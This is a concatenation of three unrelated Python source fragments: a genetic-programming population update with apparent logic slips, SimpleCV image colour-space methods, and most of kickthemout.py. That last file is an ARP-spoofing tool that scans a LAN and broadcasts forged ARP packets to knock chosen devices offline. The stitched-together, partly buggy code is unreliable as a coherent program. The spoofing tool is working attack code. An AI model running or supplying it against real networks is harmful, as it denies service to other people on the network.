# mutation offsprings and reproduction offsprings
crossover_size= math.ceil(popsize*crossover_prob)
mutation_size= math.ceil(popsize*mutation_prob)
reproduction_size= math.ceil(popsize*reproduction_prob)
sizes=[crossover_size,mutation_size,reproduction_size]
theoretical_size=sum(sizes)
if theoretical_size >popsize:
nb=theoretical_size-popsize
if crossover_size>mutation_size and mutation_size>=reproduction_size:
crossover_size=crossover_size-nb
elif mutation_size>crossover_size and crossover_size>=reproduction_size:
mutation_size=crossover_size-nb
elif reproduction_size>crossover_size and crossover_size>=mutation_size:
mutation_size=crossover_size-nb
else:
crossover_size=crossover_size-nb
#print crossover_size
#print mutation_size
#print reproduction_size
# get the ordered list of fitnesses with identifier keys
db_list=selection.GetDBKeysAndFitness(dbname,tablename)
# start by selecting fittest parents for reproduction
reprod=selection.SelectDBSeveralFittest(int(reproduction_size), db_list)
#print reprod
# then select parents for crossover
cross=selection.TournamentSelectDBSeveral(int(crossover_size),size, prob_selection,db_list)
#print cross
# then select parents for mutation
mut=selection.TournamentSelectDBSeveral(int(mutation_size),size, prob_selection,db_list)
#print mut
#open database
con = sqlite.connect(dbname)
#add to new population these reproduced offsprings
#writepop.ClearDBTable(dbname,tablename2)
#con.execute("create table %s(o_id INTEGER PRIMARY KEY,tree TEXT,\
# tree_mapping TEXT, treedepth INTEGER, evaluated INTEGER, fitness FLOAT)"%tablename2)
# apply reproduction operator and copy to new population database
for elem in reprod:
o_id=elem[0]
#print o_id
SELECT = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id)
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
my_tree=copy.deepcopy(marshal.loads(myresult[0]))
my_tree_mapping=copy.deepcopy(marshal.loads(myresult[1]))
my_treedepth=myresult[2]
my_evaluated=myresult[3]
my_fitness=myresult[4]
# write a copy of the selected parent in the new database
new_pop.append((o_id,my_tree, my_tree_mapping,my_treedepth,my_evaluated,my_fitness))
trees.append(my_tree)
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values (NULL,?,?,?,?,?)"%tablename2,(buffer(marshal.dumps(myresult[0],-1)),buffer(marshal.dumps(myresult[1],-1)),my_treedepth,my_evaluated,my_fitness))
con.commit()
# apply mutation operator and copy to new population database
for elem in mut:
o_id=elem[0]
#print o_id
SELECT = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id)
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
my_tree=copy.deepcopy(marshal.loads(myresult[0]))
my_tree_mapping=copy.deepcopy(marshal.loads(myresult[1]))
my_treedepth=myresult[2]
my_evaluated=myresult[3]
my_fitness=myresult[4]
same_tree=True
mt=mutation.Mutate(maxdepth,my_tree,my_tree_mapping,my_treedepth)
same_tree=mt[0]
if mt in trees:
same_tree=True
# make sure to try another mutation if the offspring is identical to the parent
if same_tree==True:
while same_tree==True:
mt=mutation.Mutate(maxdepth,my_tree,my_tree_mapping,my_treedepth)
same_tree=mt[0]
mt_map=crossutil.GetIndicesMappingFromTree(mt[1])
mt_depth=crossutil.GetDepthFromIndicesMapping(mt_map)
mt_evaluated=1
# get fitness of the tree
result_fitness=settings.FitnessFunction(mt[1])
#mt_fitness=evalfitness.EvalTreeForAllInputSets(mt[1],xrange(settings.nb_eval))
#mt_fitness=evalfitness.EvalTreeForOneListInputSet(mt[1])
#result_fitness=evalfitness.FinalFitness(mt_fitness)
#result_fitness=evalfitness.FinalFitness2(mt_fitness)
#result_fitness=evalfitness.FinalFitness3(mt_fitness)
#result_fitness=evalfitness.FinalFitness4(mt_fitness)
#print result_fitness
# write a copy of the selected parent in the new database
new_pop.append((o_id,mt[1], mt_map,mt_depth,mt_evaluated,result_fitness))
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values (NULL,?,?,?,?,?)"%tablename2,(buffer(marshal.dumps(mt[1],-1)),buffer(marshal.dumps(mt_map,-1)),mt_depth,mt_evaluated,result_fitness))
con.commit()
# apply crossover operator and copy to new population database
for elem in cross:
# select the second parent using tournament selection
parent2=selection.TournamentSelectDBSeveral(2,7, 0.8,db_list)
# make sure parent2 is different from parent1
if elem==parent2[0]:
elem2=parent2[1]
else:
elem2=parent2[0]
o_id=elem[0]
o_id2=elem2[0]
#print o_id
#print o_id2
cur = con.cursor()
SELECT1 = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id)
cur.execute(SELECT1)
con.commit()
myresult1= cur.fetchone()
SELECT2 = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id2)
cur.execute(SELECT2)
con.commit()
myresult2= cur.fetchone()
my_tree1=copy.deepcopy(marshal.loads(myresult1[0]))
my_tree1_mapping=copy.deepcopy(marshal.loads(myresult1[1]))
my_tree1depth=myresult1[2]
my_evaluated1=myresult1[3]
my_fitness1=myresult1[4]
my_tree2=copy.deepcopy(marshal.loads(myresult2[0]))
my_tree2_mapping=copy.deepcopy(marshal.loads(myresult2[1]))
my_tree2depth=myresult2[2]
my_evaluated2=myresult2[3]
my_fitness2=myresult2[4]
#cs=crossover.Koza1PointCrossover(maxdepth,my_tree1,my_tree2,my_tree1_mapping,my_tree2_mapping,my_tree1depth,my_tree2depth)
#print cs
#cs=mutation.Mutate(maxdepth,my_tree,my_tree_mapping,my_treedepth)
cs_evaluated=1
# get fitness of the tree
input_sets=xrange(settings.nb_eval)
cs=[[0,0,0,0]]
i=0
while cs[0]!=[1,1,1,1] and i<100 :
#cp_my_tree1=copy.deepcopy(marshal.loads(myresult1[0]))
#cp_my_tree1_mapping=copy.deepcopy(marshal.loads(myresult1[1]))
#cp_my_tree2=copy.deepcopy(marshal.loads(myresult2[0]))
#cp_my_tree2_mapping=copy.deepcopy(marshal.loads(myresult2[1]))
cp_my_tree1=marshal.loads(myresult1[0])
cp_my_tree1_mapping=marshal.loads(myresult1[1])
cp_my_tree2=marshal.loads(myresult2[0])
cp_my_tree2_mapping=marshal.loads(myresult2[1])
cs=crossover.Koza1PointCrossover(maxdepth,cp_my_tree1,cp_my_tree2,cp_my_tree1_mapping,cp_my_tree2_mapping,my_tree1depth,my_tree2depth)
#trees.append(cs[1])
#trees.append(cs[2])
i=i+1
#print cs[1]
#print cs[2]
# if after trying 50 times , the crossover cannot give a correct offspring, then
# create a new offspring using mutation...
if cs[0]!=[1,1,1,1] and settings.Substitute_Mutation==1:
mt=mutation.Mutate(maxdepth,cp_my_tree1,cp_my_tree1_mapping,my_tree1depth)
mt_map=crossutil.GetIndicesMappingFromTree(mt[1])
mt_depth=crossutil.GetDepthFromIndicesMapping(mt_map)
mt_evaluated=1
# get fitness of the tree
result_fitness=settings.FitnessFunction(mt[1])
new_pop.append((o_id,mt[1], mt_map,mt_depth,mt_evaluated,result_fitness))
else:
try:
offspring1_result_fitness=settings.FitnessFunction(cs[1])
#cs_offspring1_fitness=evalfitness.EvalTreeForAllInputSets(cs[1],input_sets)
#cs_offspring1_fitness=evalfitness.EvalTreeForOneListInputSet(cs[1])
except:
print 'pb when applying fitness function to results of crossover'
print cs[1]
print cs[0]
try:
offspring2_result_fitness=settings.FitnessFunction(cs[2])
#cs_offspring1_fitness=evalfitness.EvalTreeForAllInputSets(cs[1],input_sets)
#cs_offspring1_fitness=evalfitness.EvalTreeForOneListInputSet(cs[1])
except:
print 'pb when applying fitness function to results of crossover'
print cs[2]
print cs[0]
#try:
# cs_offspring2_fitness=evalfitness.EvalTreeForAllInputSets(cs[2],input_sets)
#cs_offspring2_fitness=evalfitness.EvalTreeForOneListInputSet(cs[2])
#except:
# print cs[2]
# print cs[0]
#offspring1_result_fitness=evalfitness.FinalFitness(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness(cs_offspring2_fitness)
#offspring1_result_fitness=evalfitness.FinalFitness2(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness2(cs_offspring2_fitness)
#offspring1_result_fitness=evalfitness.FinalFitness3(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness3(cs_offspring2_fitness)
#offspring1_result_fitness=evalfitness.FinalFitness4(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness4(cs_offspring2_fitness)
#print result_fitness
# write a copy of the selected parent in the new database
if offspring1_result_fitness>=offspring2_result_fitness:
cs_map=crossutil.GetIndicesMappingFromTree(cs[1])
cs_depth=crossutil.GetDepthFromIndicesMapping(cs_map)
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values (NULL,?,?,?,?,?)"%tablename2,(buffer(marshal.dumps(cs[1],-1)),buffer(marshal.dumps(cs_map,-1)),cs_depth,cs_evaluated,offspring1_result_fitness))
new_pop.append((o_id,cs[1], cs_map,cs_depth,cs_evaluated,offspring1_result_fitness))
#trees.append(cs[1])
if offspring1_result_fitness<offspring2_result_fitness:
cs_map=crossutil.GetIndicesMappingFromTree(cs[2])
cs_depth=crossutil.GetDepthFromIndicesMapping(cs_map)
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values | |
destructor.
"""
try :
for i in self._tempFiles:
if (isinstance(i,str)):
os.remove(i)
except :
pass
def getEXIFData(self):
"""
**SUMMARY**
This function extracts the exif data from an image file like JPEG or TIFF. The data is returned as a dict.
**RETURNS**
A dictionary of key value pairs. The value pairs are defined in the EXIF.py file.
**EXAMPLE**
>>> img = Image("./SimpleCV/sampleimages/OWS.jpg")
>>> data = img.getEXIFData()
>>> data['Image GPSInfo'].values
**NOTES**
* Compliments of: http://exif-py.sourceforge.net/
* See also: http://en.wikipedia.org/wiki/Exchangeable_image_file_format
**See Also**
:py:class:`EXIF`
"""
import os, string
if( len(self.filename) < 5 or self.filename is None ):
#I am not going to warn, better of img sets
#logger.warning("ImageClass.getEXIFData: This image did not come from a file, can't get EXIF data.")
return {}
fileName, fileExtension = os.path.splitext(self.filename)
fileExtension = string.lower(fileExtension)
if( fileExtension != '.jpeg' and fileExtension != '.jpg' and
fileExtension != 'tiff' and fileExtension != '.tif'):
#logger.warning("ImageClass.getEXIFData: This image format does not support EXIF")
return {}
raw = open(self.filename,'rb')
data = process_file(raw)
return data
def live(self):
"""
**SUMMARY**
This shows a live view of the camera.
* Left click will show mouse coordinates and color.
* Right click will kill the live image.
**RETURNS**
Nothing. In place method.
**EXAMPLE**
>>> cam = Camera()
>>> cam.live()
"""
start_time = time.time()
from SimpleCV.Display import Display
i = self
d = Display(i.size())
i.save(d)
col = Color.RED
while d.isNotDone():
i = self
i.clearLayers()
elapsed_time = time.time() - start_time
if d.mouseLeft:
txt = "coord: (" + str(d.mouseX) + "," + str(d.mouseY) + ")"
i.dl().text(txt, (10,i.height / 2), color=col)
txt = "color: " + str(i.getPixel(d.mouseX,d.mouseY))
i.dl().text(txt, (10,(i.height / 2) + 10), color=col)
print "coord: (" + str(d.mouseX) + "," + str(d.mouseY) + "), color: " + str(i.getPixel(d.mouseX,d.mouseY))
if elapsed_time > 0 and elapsed_time < 5:
i.dl().text("In live mode", (10,10), color=col)
i.dl().text("Left click will show mouse coordinates and color", (10,20), color=col)
i.dl().text("Right click will kill the live image", (10,30), color=col)
i.save(d)
if d.mouseRight:
print "Closing Window"
d.done = True
pg.quit()
def getColorSpace(self):
"""
**SUMMARY**
Returns the value matched in the color space class
**RETURNS**
Integer corresponding to the color space.
**EXAMPLE**
>>> if(image.getColorSpace() == ColorSpace.RGB)
**SEE ALSO**
:py:class:`ColorSpace`
"""
return self._colorSpace
def isRGB(self):
"""
**SUMMARY**
Returns true if this image uses the RGB colorspace.
**RETURNS**
True if the image uses the RGB colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isRGB() ):
>>> r,g,b = img.splitChannels()
**SEE ALSO**
:py:meth:`toRGB`
"""
return(self._colorSpace==ColorSpace.RGB)
def isBGR(self):
"""
**SUMMARY**
Returns true if this image uses the BGR colorspace.
**RETURNS**
True if the image uses the BGR colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isBGR() ):
>>> b,g,r = img.splitChannels()
**SEE ALSO**
:py:meth:`toBGR`
"""
return(self._colorSpace==ColorSpace.BGR)
def isHSV(self):
"""
**SUMMARY**
Returns true if this image uses the HSV colorspace.
**RETURNS**
True if the image uses the HSV colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isHSV() ):
>>> h,s,v = img.splitChannels()
**SEE ALSO**
:py:meth:`toHSV`
"""
return(self._colorSpace==ColorSpace.HSV)
def isHLS(self):
"""
**SUMMARY**
Returns true if this image uses the HLS colorspace.
**RETURNS**
True if the image uses the HLS colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isHLS() ):
>>> h,l,s = img.splitChannels()
**SEE ALSO**
:py:meth:`toHLS`
"""
return(self._colorSpace==ColorSpace.HLS)
def isXYZ(self):
"""
**SUMMARY**
Returns true if this image uses the XYZ colorspace.
**RETURNS**
True if the image uses the XYZ colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isXYZ() ):
>>> x,y,z = img.splitChannels()
**SEE ALSO**
:py:meth:`toXYZ`
"""
return(self._colorSpace==ColorSpace.XYZ)
def isGray(self):
"""
**SUMMARY**
Returns true if this image uses the Gray colorspace.
**RETURNS**
True if the image uses the Gray colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isGray() ):
>>> print "The image is in Grayscale."
**SEE ALSO**
:py:meth:`toGray`
"""
return(self._colorSpace==ColorSpace.GRAY)
def isYCrCb(self):
"""
**SUMMARY**
Returns true if this image uses the YCrCb colorspace.
**RETURNS**
True if the image uses the YCrCb colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isYCrCb() ):
>>> Y,Cr,Cb = img.splitChannels()
**SEE ALSO**
:py:meth:`toYCrCb`
"""
return(self._colorSpace==ColorSpace.YCrCb)
def toRGB(self):
"""
**SUMMARY**
This method attemps to convert the image to the RGB colorspace.
If the color space is unknown we assume it is in the BGR format
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> RGBImg = img.toRGB()
**SEE ALSO**
:py:meth:`isRGB`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.BGR or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_BGR2RGB)
elif( self._colorSpace == ColorSpace.HSV ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HSV2RGB)
elif( self._colorSpace == ColorSpace.HLS ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HLS2RGB)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2RGB)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2RGB)
elif( self._colorSpace == ColorSpace.RGB ):
retVal = self.getBitmap()
else:
logger.warning("Image.toRGB: There is no supported conversion to RGB colorspace")
return None
return Image(retVal, colorSpace=ColorSpace.RGB )
def toBGR(self):
"""
**SUMMARY**
This method attemps to convert the image to the BGR colorspace.
If the color space is unknown we assume it is in the BGR format.
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> BGRImg = img.toBGR()
**SEE ALSO**
:py:meth:`isBGR`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.RGB or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_RGB2BGR)
elif( self._colorSpace == ColorSpace.HSV ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HSV2BGR)
elif( self._colorSpace == ColorSpace.HLS ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HLS2BGR)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2BGR)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2BGR)
elif( self._colorSpace == ColorSpace.BGR ):
retVal = self.getBitmap()
else:
logger.warning("Image.toBGR: There is no supported conversion to BGR colorspace")
return None
return Image(retVal, colorSpace = ColorSpace.BGR )
def toHLS(self):
"""
**SUMMARY**
This method attempts to convert the image to the HLS colorspace.
If the color space is unknown we assume it is in the BGR format.
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> HLSImg = img.toHLS()
**SEE ALSO**
:py:meth:`isHLS`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.BGR or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_BGR2HLS)
elif( self._colorSpace == ColorSpace.RGB):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.HSV ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HSV2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.HLS ):
retVal = self.getBitmap()
else:
logger.warning("Image.toHSL: There is no supported conversion to HSL colorspace")
return None
return Image(retVal, colorSpace = ColorSpace.HLS )
def toHSV(self):
"""
**SUMMARY**
This method attempts to convert the image to the HSV colorspace.
If the color space is unknown we assume it is in the BGR format
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> HSVImg = img.toHSV()
**SEE ALSO**
:py:meth:`isHSV`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.BGR or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_BGR2HSV)
elif( self._colorSpace == ColorSpace.RGB):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.HLS ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HLS2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.HSV ):
retVal = self.getBitmap()
else:
logger.warning("Image.toHSV: There is no supported conversion to HSV colorspace")
return None
return Image(retVal, colorSpace = ColorSpace.HSV )
def toXYZ(self):
"""
**SUMMARY**
This method attemps to convert the image to the XYZ colorspace.
If the color space is unknown we assume it is | |
#!/usr/bin/env python3
# -.- coding: utf-8 -.-
# kickthemout.py
"""
Copyright (C) 2017-18 <NAME> (<EMAIL>) & <NAME> (<EMAIL>)
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
"""
import os, sys, logging, math, traceback, optparse, threading
from time import sleep
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
try:
# check whether user is root
if os.geteuid() != 0:
print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END))
os._exit(1)
except:
# then user is probably on windows
pass
def shutdown():
print('\n\n{}Thanks for dropping by.'
'\nCatch ya later!{}'.format(GREEN, END))
os._exit(1)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
try:
from scapy.config import conf
conf.ipv6_enabled = False
from scapy.all import *
import scan, spoof, nmap
from urllib.request import urlopen, Request
from urllib.error import URLError
except KeyboardInterrupt:
shutdown()
except:
print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
# display heading
def heading():
spaces = " " * 76
sys.stdout.write(GREEN + spaces + """
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
█ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
▀ ▀ ▀ ▀ ▀▀▀
""" + END + BLUE +
'\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
'\n' + 'Made With <3 by: {0}<NAME> ({1}k4m4{2}) & {0}<NAME> ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) +
'\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86))
# loading animation during network scan
def scanningAnimation(text):
try:
global stopAnimation
i = 0
while stopAnimation is not True:
tempText = list(text)
if i >= len(tempText):
i = 0
tempText[i] = tempText[i].upper()
tempText = ''.join(tempText)
sys.stdout.write(GREEN + tempText + '\r' + END)
sys.stdout.flush()
i += 1
time.sleep(0.1)
except:
os._exit(1)
# display options
def optionBanner():
print('\nChoose an option from the menu:\n')
sleep(0.2)
print('\t{}[{}1{}]{} Kick ONE Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\t{}[{}2{}]{} Kick SOME Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\t{}[{}3{}]{} Kick ALL Off'.format(YELLOW, RED, YELLOW, WHITE))
sleep(0.2)
print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE))
# initiate debugging process
def runDebug():
print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END))
print(
"{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format(
RED, END))
try:
print("Current defaultGatewayMac: " + defaultGatewayMac)
except:
print("Failed to print defaultGatewayMac...")
try:
print("Reloading MAC retriever function...")
regenOnlineIPs()
print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
except:
print("Failed to reload MAC retriever function / to print defaultGatewayMac...")
try:
print("Known gateway IP: " + defaultGatewayIP)
except:
print("Failed to print defaultGatewayIP...")
try:
print("Crash trace: ")
print(traceback.format_exc())
except:
print("Failed to print crash trace...")
print("DEBUG FINISHED.\nShutting down...")
print("{}".format(END))
os._exit(1)
# make sure there is an internet connection
def checkInternetConnection():
try:
urlopen('https://www.baidu.com', timeout=3)
return True
except URLError as err:
return False
except KeyboardInterrupt:
shutdown()
# retrieve network interface
def getDefaultInterface(returnNet=False):
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
def to_CIDR_notation(bytes_network, bytes_netmask):
network = scapy.utils.ltoa(bytes_network)
netmask = long2net(bytes_netmask)
net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
return net
iface_routes = [route for route in scapy.config.conf.route.routes if route[3] == scapy.config.conf.iface and route[1] != 0xFFFFFFFF]
network, netmask, _, interface, address = max(iface_routes, key=lambda item:item[1])
net = to_CIDR_notation(network, netmask)
if net:
if returnNet:
return net
else:
return interface
# retrieve default interface MAC address
def getDefaultInterfaceMAC():
try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac:
print(
"\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(
RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
else:
return defaultInterfaceMac
except:
# request interface MAC address (after failed detection by scapy)
print("\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve gateway IP
def getGatewayIP():
global stopAnimation
try:
getGateway = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway.src
except:
# request gateway IP address (after failed detection by scapy)
stopAnimation = True
print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END))
header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
return (input(header))
# retrieve host MAC address
def retrieveMACAddress(host):
try:
query = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host)
ans, _ = srp(query, timeout=2, verbose=0)
for _, rcv in ans:
return rcv[Ether].src
break
except:
return False
# resolve mac address of each vendor
def resolveMac(mac):
try:
# send request to macvendors.co
url = "http://macvendors.co/api/vendorname/"
request = Request(url + mac, headers={'User-Agent': "API Browser"})
response = urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
vendor = vendor[:25]
return vendor
except KeyboardInterrupt:
shutdown()
except:
return "N/A"
# regenerate online IPs array & configure gateway
def regenOnlineIPs():
global onlineIPs, defaultGatewayMac, defaultGatewayMacSet
if not defaultGatewayMacSet:
defaultGatewayMac = ""
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if not defaultGatewayMacSet:
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "":
# request gateway MAC address (after failed detection by scapy)
print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END))
header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = input(header)
defaultGatewayMacSet = True
# scan network
def scanNetwork():
global hostsList
try:
# call scanning function from scan.py
hostsList = scan.scanNetwork(getDefaultInterface(True))
except KeyboardInterrupt:
shutdown()
except:
print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END))
print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END))
os._exit(1)
try:
regenOnlineIPs()
except KeyboardInterrupt:
shutdown()
# non-interactive attack
def nonInteractiveAttack():
print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END))
target = options.targets
print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target)))
global stopAnimation
stopAnimation = False
t = threading.Thread(target=scanningAnimation, args=('Checking target status...',))
t.daemon = True
t.start()
try:
nm = nmap.PortScanner()
counter = 0
for host in target:
a = nm.scan(hosts=host, arguments='-sn')
if a['scan'] != {}:
for k, v in a['scan'].items():
if str(v['status']['state']) == 'up':
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
else:
if len(target) == 1 or counter == len(target)-1:
stopAnimation = True
sys.stdout.write("\033[K")
print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END))
os._exit(1)
else:
sys.stdout.write("\033[K")
print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END))
target.remove(host)
counter += 1
pass
stopAnimation = True
sys.stdout.write("\033[K")
defaultGatewayIP = getGatewayIP()
defaultGatewayMac = retrieveMACAddress(defaultGatewayIP)
except KeyboardInterrupt:
shutdown()
if options.packets is not None:
print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets)))
else:
print("\n{}Spoofing started... {}".format(GREEN, END))
try:
while True:
# broadcast malicious ARP packets
for i in target:
ipAddress = i
macAddress = retrieveMACAddress(ipAddress)
if macAddress == False:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress)
if options.packets is not None:
time.sleep(60/float(options.packets))
else:
time.sleep(10)
except KeyboardInterrupt:
# re-arp targets on KeyboardInterrupt exception
print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END))
reArp = 1
while reArp != 10:
# broadcast ARP packets with legitimate info to restore connection
for i in target:
ipAddress = i
try:
macAddress = retrieveMACAddress(ipAddress)
except:
print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END))
os._exit(1)
try:
